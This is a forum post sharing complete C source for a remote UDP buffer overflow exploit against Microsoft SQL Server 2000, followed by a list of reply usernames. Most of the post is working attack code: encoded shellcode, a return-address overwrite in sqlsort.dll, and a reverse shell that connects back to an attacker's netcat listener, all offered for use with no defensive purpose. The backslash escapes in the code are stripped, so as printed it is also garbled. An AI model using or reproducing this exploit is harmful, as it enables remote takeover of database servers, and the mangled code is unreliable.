Sql2000 Remote Udp Exploit(new)

Here is a VERY GOOD Exploit that i found - the exploit is for: MSSQL2000, it called "MSSQL2000 Remote UDP Exploit(New)"..

here is the source Code:

* 
MSSQL2000 Remote UDP Exploit! 

Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com 

Modified by lion, lion@cnhonker.net 

*/ 


#include <stdio.h> 
#include <winsock2.h> 

#pragma comment (lib,"Ws2_32") 

int GainControlOfSQL(void); 
int StartWinsock(void); 

struct sockaddr_in c_sa; 
struct sockaddr_in s_sa; 

struct hostent *he; 
SOCKET sock; 
unsigned long addr; 
int SQLUDPPort=1434; 
char host[256]=""; 
char request[4000]="x04"; 

int explen=361; 
int len; 

char exploit_code[362]= 
"x55x8BxECx68x18x10xAEx42x68x1C" 
"x10xAEx42xEBx03x5BxEBx05xE8xF8" 
"xFFxFFxFFxBExFFxFFxFFxFFx81xF6" 
"xAExFExFFxFFx03xDEx90x90x90x90" 
"x90x33xC9xB1x44xB2x58x30x13x83" 
"xEBx01xE2xF9x43x53x8Bx75xFCxFF" 
"x16x50x33xC0xB0x0Cx03xD8x53xFF" 
"x16x50x33xC0xB0x10x03xD8x53x8B" 
"x45xF4x50x8Bx75xF8xFFx16x50x33" 
"xC0xB0x0Cx03xD8x53x8Bx45xF4x50" 
"xFFx16x50x33xC0xB0x08x03xD8x53" 
"x8Bx45xF0x50xFFx16x50x33xC0xB0" 
"x10x03xD8x53x33xC0x33xC9x66xB9" 
"x04x01x50xE2xFDx89x45xDCx89x45" 
"xD8xBFx7Fx01x01x01x89x7DxD4x40" 
"x40x89x45xD0x66xB8xFFxFFx66x35" 
"xFFxCAx66x89x45xD2x6Ax01x6Ax02" 
"x8Bx75xECxFFxD6x89x45xECx6Ax10" 
"x8Dx75xD0x56x8Bx5DxECx53x8Bx45" 
"xE8xFFxD0x83xC0x44x89x85x58xFF" 
"xFFxFFx83xC0x5Ex83xC0x5Ex89x45" 
"x84x89x5Dx90x89x5Dx94x89x5Dx98" 
"x8DxBDx48xFFxFFxFFx57x8DxBDx58" 
"xFFxFFxFFx57x33xC0x50x50x50x83" 
"xC0x01x50x83xE8x01x50x50x8Bx5D" 
"xE0x53x50x8Bx45xE4xFFxD0x33xC0" 
"x50xC6x04x24x61xC6x44x24x01x64" 
"x68x54x68x72x65x68x45x78x69x74" 
"x54x8Bx45xF0x50x8Bx45xF8xFFx10" 
"xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76" 
"x3Cx34x34x58x58x33x3Dx2Ax36x3D" 
"x34x6Bx6Ax76x3Cx34x34x58x58x58" 
"x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C" 
"x19x58x58x3Bx37x36x36x3Dx3Bx2C" 
"x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37" 
"x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C" 
"x58"; 


int main(int argc, char *argv[]) 
{ 
unsigned int ErrorLevel=0; 
int count = 0; 
char sc[300]=""; 
char ipaddress[40]=""; 
unsigned short port = 0; 
unsigned int ip = 0; 
char *ipt=""; 
char buffer[400]=""; 
unsigned short prt=0; 
char *prtt=""; 


if(argc != 2 && argc != 5) 
{ 
printf("===============================================================rn"); 
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn"); 
printf("Modified from "Advanced Windows Shellcode"rn"); 
printf("Code by David Litchfield, david@ngssoftware.comrn"); 
printf("Modified by lion, fix a bug.rn"); 
printf("Welcome to HUC Website http://www.cnhonker.comrnn"); 
printf("Usage:rn"); 
printf(" �%s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]); 
printf("Exemple:rn"); 
printf(" �C:\>nc -l -p 53rn"); 
printf("Target is MSSQL SP 0:rn"); 
printf(" �C:\>%s 192.168.0.1 192.168.7.1 53 0rn",argv[0]); 
printf("Target is MSSQL SP 1 or 2:rn"); 
printf(" �c:\>%s 192.168.0.1 192.168.7.1 53 1rnn", argv[0]); 
return 0; 
} 

strncpy(host, argv[1], 100); 

strncpy(ipaddress, argv[2], 36); 

port = atoi(argv[3]); 

// SQL Server 2000 Service pack level 
// The import entry for GetProcAddress in sqlsort.dll 
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C 
// Need to set the last byte accordingly 

if(argv[4][0] == 0x30) 
{ 
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn"); 
exploit_code[9]=0x10; 
} 
else 
{ 
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn"); 
} 

ErrorLevel = StartWinsock(); 
if(ErrorLevel==0) 
{ 
printf("Starting Winsock Error.rn"); 
return 0; 
} 

strcpy(buffer,exploit_code); 

// set this IP address to connect back to 
// this should be your address 
ip = inet_addr(ipaddress); 
ipt = (char*)&ip; 
buffer[142]=ipt[0]; 
buffer[143]=ipt[1]; 
buffer[144]=ipt[2]; 
buffer[145]=ipt[3]; 

// set the TCP port to connect on 
// netcat should be listening on this port 
// e.g. nc -l -p 80 

prt = htons(port); 
prt = prt ^ 0xFFFF; 
prtt = (char *) &prt; 
buffer[160]=prtt[0]; 
buffer[161]=prtt[1]; 

strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS
TTTTUUUUVVVVWWWWXXXX"); 

// Overwrite the saved return address on the stack 
// This address contains a jmp esp instruction 
// and is in sqlsort.dll. 

strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC 

// Need to do a near jump 
strcat(request,"xEBx0Ex41x42x43x44x45x46"); 

// Need to set an address which is writable or 
// sql server will crash before we can exploit 
// the overrun. Rather than choosing an address 
// on the stack which could be anywhere we'll 
// use an address in the .data segment of sqlsort.dll 
// as we're already using sqlsort for the saved 
// return address 

// SQL 2000 no service packs needs the address here 
strcat(request,"x01x70xAEx42"); 

// SQL 2000 Service Pack 2 needs the address here 
strcat(request,"x01x70xAEx42"); 

// just a few nops 
strcat(request,"x90x90x90x90x90x90x90x90"); 

len = strlen(request)+ explen; 

// tack on exploit code to the end of our request and fire it off 
memcpy(request+strlen(request), buffer, explen); 

// printf("Size: %d/%drn", len, strlen(request)); 

GainControlOfSQL(); 

return 0; 
} 


int StartWinsock() 
{ 
int err=0; 
WORD wVersionRequested; 
WSADATA wsaData; 

wVersionRequested = MAKEWORD(2,1); 
err = WSAStartup( wVersionRequested, &wsaData ); 
if (err != 0) 
{ 
printf("error WSAStartup 1.rn"); 
return 0; 
} 
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 ) 
{ 
printf("error WSAStartup 2.rn"); 
WSACleanup( ); 
return 0; 
} 

if (isalpha(host[0])) 
{ 
he = gethostbyname(host); 

if (he == NULL) 
{ 
printf("Can't get the ip of %s!rn", host); 
WSACleanup( ); 
exit(-1); 
} 

s_sa.sin_addr.s_addr=INADDR_ANY; 
s_sa.sin_family=AF_INET; 
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); 
} 
else 
{ 
s_sa.sin_family=AF_INET; 
s_sa.sin_addr.s_addr = inet_addr(host); 
} 

return 1; 
} 

int GainControlOfSQL(void) 
{ 
char resp[600]=""; 
int snd=0,rcv=0,count=0, var=0; 
unsigned int ttlbytes=0; 
unsigned int to=2000; 
SOCKET s; 


s=socket(AF_INET,SOCK_DGRAM,0); 
if (s==INVALID_SOCKET) 
{ 
return printf("sock error.rn"); 
} 

setsockopt(s, SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int)); 

s_sa.sin_port=htons((unsigned short)SQLUDPPort); 

if (connect(s,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) 
{ 
return printf("Connect errorrn"); 
} 
else 
{ 
snd=send(s, request , len , 0); 

/* printf("---"); 
for(int i=0; i<len;i++) 
{ 
if((i%16)==0) 
printf("n"); 
printf("%02X ",request[i]&0xff); 
} 
printf("n---n"); 
*/ 

printf("Packet sent!rn"); 
printf("If you don't have a shell it didn't work.rn"); 
rcv = recv(s,resp,596,0); 
if(rcv > 1) 
{ 
while(count < rcv) 
{ 
if(resp[count]==0x00) 
resp[count]=0x20; 
count++; 
} 
printf("%s",resp); 
} 
} 
closesocket(s); 

return 0; 
}

* i know its bit long for this page but.. its good exploit and i tought i should share it. *

Forums: Sql2000 Remote Udp Exploit(new) - Forums

Sql2000 Remote Udp Exploit(new) SQL2000 Remote UDP Exploit(New)

#1 Guest_FL4Me_*

#2 groove-monkey

#3 Guest_FL4Me_*

#4 larsbruggie

#5 jurk-off

#6 thesource

#7 Guest_MKZ_*

#8 woutiir

#9 shaun2k2

#10 will_do

#11 SoleKiller

#12 bratt

#13 Guest_TheCommiser_*

#14 Guest_SyN/AcK_*

#15 Guest_INVASION_*

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

Our Sponsors:

Skin and Language

Execution Stats